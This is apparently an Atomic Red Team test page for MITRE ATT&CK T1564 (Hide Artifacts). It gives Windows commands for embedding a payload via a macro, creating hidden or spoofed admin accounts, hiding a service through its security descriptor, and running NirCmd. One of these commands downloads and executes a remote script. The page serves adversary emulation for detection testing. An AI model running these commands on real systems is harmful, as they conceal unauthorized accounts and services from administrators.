# T1564 - Hide Artifacts
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1564)
<blockquote>

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)

Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)

</blockquote>

## Atomic Tests

- [Atomic Test #1 - Extract binary files via VBA](#atomic-test-1---extract-binary-files-via-vba)

- [Atomic Test #2 - Create a Hidden User Called "$"](#atomic-test-2---create-a-hidden-user-called-)

- [Atomic Test #3 - Create an "Administrator " user (with a space on the end)](#atomic-test-3---create-an-administrator--user-with-a-space-on-the-end)

- [Atomic Test #4 - Create and Hide a Service with sc.exe](#atomic-test-4---create-and-hide-a-service-with-scexe)

- [Atomic Test #5 - Command Execution with NirCmd](#atomic-test-5---command-execution-with-nircmd)


<br/>

## Atomic Test #1 - Extract binary files via VBA
This module extracts a binary (calc.exe) from inside of another binary. 

In the wild maldoc authors will use this technique to hide binaries inside of files stored 
within the office document itself. An example of this technique can be seen in sample

f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226

This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2
is the same document without all the malicious code. Document 1 will copy Document 2 to the file system
and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this
oleObject.bin file is a payload that is parsed out and executed on the file system.

**Supported Platforms:** Windows


**auto_generated_guid:** 6afe288a-8a8b-4d33-a629-8d03ba9dad3a






#### Attack Commands: Run with `powershell`! 


```powershell
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
$macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
```

#### Cleanup Commands:
```powershell
Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
```



#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Word must be installed
##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  Stop-Process -Name "winword"
  exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
```




<br/>
<br/>

## Atomic Test #2 - Create a Hidden User Called "$"
Creating a user with a username containing "$"

**Supported Platforms:** Windows


**auto_generated_guid:** 2ec63cc2-4975-41a6-bf09-dffdfb610778






#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


```cmd
net user $ ATOMIC123! /add /active:yes
```

#### Cleanup Commands:
```cmd
net user $ /DELETE 2>&1
```





<br/>
<br/>

## Atomic Test #3 - Create an "Administrator " user (with a space on the end)
Creating a user with a username containing with a space on the end

**Supported Platforms:** Windows


**auto_generated_guid:** 5bb20389-39a5-4e99-9264-aeb92a55a85c






#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
New-LocalUser -Name "Administrator " -NoPassword
```

#### Cleanup Commands:
```powershell
Remove-LocalUser -Name "Administrator " 2>&1 | out-null
```





<br/>
<br/>

## Atomic Test #4 - Create and Hide a Service with sc.exe
The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query.

Upon successful execution, sc.exe creates a new service changes the security descriptor.

https://twitter.com/Alh4zr3d/status/1580925761996828672
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format

**Supported Platforms:** Windows


**auto_generated_guid:** 333c7de0-6fbe-42aa-ac2b-c7e40b18246a





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | Name of service to create | string | AtomicService|
| executable_command | Command to execute as a service | string | C:&#92;Windows&#92;System32&#92;calc.exe|


#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


```cmd
sc.exe create #{service_name} binPath= "#{executable_command}"
sc sdset #{service_name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
```

#### Cleanup Commands:
```cmd
sc sdset #{service_name} "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
sc.exe delete #{service_name}
```





<br/>
<br/>

## Atomic Test #5 - Command Execution with NirCmd
NirCmd is used by threat actors to execute commands, which can include recon and privilege escalation via running commands via the SYSTEM account
See https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis

**Supported Platforms:** Windows


**auto_generated_guid:** 2748ab4a-1e0b-4cf2-a2b0-8ef765bec7be





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| nircmd_location | Location of nircmd executable | Path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;nircmd.exe|
| command_to_execute | Command for nircmd to execute | Path | win child class "Shell_TrayWnd" hide class "TrayClockWClass"|
| cleanup_command_to_execute | Cleanup command to undo the arbitrary command ran by nircmd | Path | win child class "Shell_TrayWnd" show class "TrayClockWClass"|


#### Attack Commands: Run with `powershell`! 


```powershell
cmd /c "#{nircmd_location}" #{command_to_execute}
```

#### Cleanup Commands:
```powershell
cmd /c "#{nircmd_location}" #{cleanup_command_to_execute} -erroraction silentlycontinue | out-null
```



#### Dependencies:  Run with `powershell`!
##### Description: The Nircmd executable must exist at (#{nircmd_location})
##### Check Prereq Commands:
```powershell
if (Test-Path "#{nircmd_location}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://www.nirsoft.net/utils/nircmd-x64.zip" -outfile "PathToAtomicsFolder\..\ExternalPayloads\nircmd.zip" 
expand-archive -path "PathToAtomicsFolder\..\ExternalPayloads\nircmd.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\"
```




<br/>